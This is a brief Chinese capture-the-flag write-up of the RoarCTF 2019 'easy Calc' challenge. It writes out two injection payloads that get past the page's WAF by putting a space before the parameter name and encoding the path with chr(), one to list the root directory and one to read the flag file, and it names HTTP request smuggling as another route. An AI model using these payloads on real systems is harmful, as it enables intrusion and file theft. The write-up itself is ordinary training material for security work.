roarctf2019-easy Calc

 · 2020-5-29  ·次阅读


题目地址:buuctf

打开题目是这样子的

QQ截图20200529130023

类似一个计算器

在源代码中我们看到他增加了一个waf 还发现了calc.php

QQ截图20200529130218.jpg

打开calc.php可以看到他设置了黑名单

QQ截图20200529130500.jpg

那么我们就是要想法绕过

这里我们是选择用PHP的字符串解析来bypass

构造payload:

查看目录:calc.php?%20num=var_dump(scandir(chr(47)))

1.png

这里我们发现一个文件f1agg

读取f1agg:calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

得到flag

这里我们用HTTP走私漏洞同样也可以解这道题

参考HTTP走私漏洞

2.png

3.png